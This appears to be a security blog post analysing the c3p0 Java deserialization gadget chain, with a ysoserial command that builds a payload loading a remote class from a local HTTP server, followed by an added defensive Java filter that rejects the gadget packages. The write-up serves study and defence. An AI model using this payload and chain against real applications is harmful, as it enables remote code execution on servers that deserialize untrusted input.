c3p0 Chain Analysis


Environment Setup

<dependency>
    <groupId>com.mchange</groupId>
    <artifactId>c3p0</artifactId>
    <version>0.9.5.2</version>
</dependency>

URLClassLoader Chain

  • gadget (call chain written from the sink back to the source):
com.mchange.v2.naming.ReferenceableUtils#referenceToObject;-->
com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized#getObject;-->
com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject;
  1. First, generate the ysoserial C3P0 payload:
java -jar ysoserial.jar -g C3P0 -a "http://127.0.0.1:9999/:Calc"
  2. Start an HTTP server with Calc.class placed under it; the malicious code sits in that class's static initializer block:
python -m http.server 9999

Vulnerability Analysis

Deserialization

  1. Sink: Class.forName is called in com.mchange.v2.naming.ReferenceableUtils#referenceToObject. When its second argument (initialize) is true, loading the class runs the contents of its static initializer block.
  2. Source: com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase#readObject. The object read in readObject must implement the IndirectlySerialized interface; looking at the implementing classes, com.mchange.v2.naming.ReferenceIndirector.ReferenceSerialized is one of them.
  3. The getObject method of ReferenceSerialized connects the source to the method that triggers the sink.
  • Summary: the condition for triggering the sink is that the class passed in must be an implementation of IndirectlySerialized.

Serialization

  1. The class written by writeObject, ConnectionPoolDataSource, does not itself implement the Serializable interface. While the resulting NotSerializableException is being handled, connectionPoolDataSource is wrapped instead.
  2. com.mchange.v2.naming.ReferenceIndirector#indirectForm treats connectionPoolDataSource as a Referenceable instance and finally wraps it into a ReferenceSerialized object.

Summary

  1. During deserialization, the class passed in must implement IndirectlySerialized; the wrapper class produced in writeObject's exception handling satisfies this.
  2. During serialization, the class must implement both ConnectionPoolDataSource and Referenceable; in the end the malicious URL is written through its Reference instance, and the class is loaded from there.
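The practical consequence of the chain above is that an application must never let ObjectInputStream reach the readObject of PoolBackedDataSourceBase (or the getObject of ReferenceSerialized) on untrusted input. As an added example, not code from this blog or from the c3p0 project, the following JEP 290 ObjectInputFilter rejects the two gadget packages by name before any of their readObject methods run. It assumes Java 9 or newer (java.io.ObjectInputFilter) and needs no c3p0 jar on the classpath, since patterns are matched on class names only; the Greeting class and the demo class name are constructed for this example.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

/*
 * Added example (not from the blog or from c3p0): a JEP 290 deserialization
 * filter that refuses the c3p0 gadget classes from the chain above before
 * ObjectInputStream ever calls their readObject. Requires Java 9+.
 */
public class C3p0DeserializationFilterDemo {

    // Packages of the two gadget classes in the chain
    // (ReferenceIndirector$ReferenceSerialized and PoolBackedDataSourceBase).
    // Syntax is that of ObjectInputFilter.Config.createFilter: a leading '!'
    // rejects, ".**" matches the package and all subpackages, and the trailing
    // limits cap object-graph depth and reference count for good measure.
    static final String C3P0_REJECT_PATTERN =
            "!com.mchange.v2.naming.**;"
          + "!com.mchange.v2.c3p0.**;"
          + "maxdepth=20;maxrefs=1000";

    /** Builds the c3p0 reject filter, optionally prepending extra reject patterns. */
    static ObjectInputFilter buildFilter(String... extraRejectPatterns) {
        StringBuilder pattern = new StringBuilder();
        for (String p : extraRejectPatterns) {
            pattern.append('!').append(p).append(';');
        }
        pattern.append(C3P0_REJECT_PATTERN);
        return ObjectInputFilter.Config.createFilter(pattern.toString());
    }

    /** Harmless constructed payload standing in for ordinary application data. */
    static final class Greeting implements Serializable {
        private static final long serialVersionUID = 1L;
        final String text;
        Greeting(String text) { this.text = text; }
    }

    static byte[] serialize(Serializable obj) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bos)) {
            out.writeObject(obj);
        }
        return bos.toByteArray();
    }

    /** Deserializes with the given filter installed on the stream. */
    static Object deserialize(byte[] bytes, ObjectInputFilter filter)
            throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(filter);   // must be installed before readObject()
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] stream = serialize(new Greeting("hello"));

        // 1. Ordinary data passes: Greeting matches no reject pattern, the filter
        //    answers UNDECIDED, and ObjectInputStream continues.
        Greeting ok = (Greeting) deserialize(stream, buildFilter());
        System.out.println("allowed: " + ok.text);

        // 2. Stand-in for a gadget class: reject Greeting by exact class name so
        //    the rejection path is visible without c3p0 present. A stream that
        //    carries com.mchange.v2.naming.ReferenceIndirector$ReferenceSerialized
        //    is refused the same way, before its readObject/getObject can run.
        try {
            deserialize(stream, buildFilter(Greeting.class.getName()));
            System.out.println("BUG: rejected class was deserialized");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The filter is consulted once per class descriptor in the stream, so the rejection happens while the class is being resolved and never reaches PoolBackedDataSourceBase#readObject. The same pattern string can be applied process-wide with the standard `-Djdk.serialFilter=` property instead of per stream. A reject list tied to two package names is only a stop-gap for this one chain; an allow list of the application's own serializable types is the durable fix.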

Ref

  1. https://blog.csdn.net/LTianHang/article/details/128909196
  2. https://xz.aliyun.com/t/11830
Author: Aizlm
Link: https://aizlm.github.io/2023/07/13/c3p0链分析/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.